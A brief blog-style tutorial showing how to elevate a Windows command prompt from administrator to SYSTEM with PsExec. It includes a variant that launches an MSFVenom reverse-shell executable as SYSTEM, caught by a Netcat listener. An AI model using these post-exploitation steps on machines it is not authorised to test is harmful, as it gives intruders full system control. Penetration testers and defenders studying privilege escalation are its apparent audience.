Elevate to SYSTEM privilege (Windows)

Hi everyone!

This is post is on elevating your CMD to SYSTEM access. Let’s get started!


  • Psexec.exe (Sysinternal tool)
  • Local administration privilege

Obtaining SYSTEM

Firstly, launch CMD in administrative privilege if you are on GUI. Otherwise, make sure you are on an admin account in a reverse/bind shell.

Local spawn CMD

In your CMD:

> Psexec.exe -s -i cmd.exe

Reverse shell

Make sure you have a compiled EXE file which can be a reverse shell from MSFVenom. Listen via your Netcat in the specified port when creating the reverse shell. In your CMD:

> Psexec.exe -s -i msfRevShell.exe


It should show you this when you run the whoami command:

> whoami
nt authority\system

I hope this post has been helpful to you. Feel free to leave any comments below.


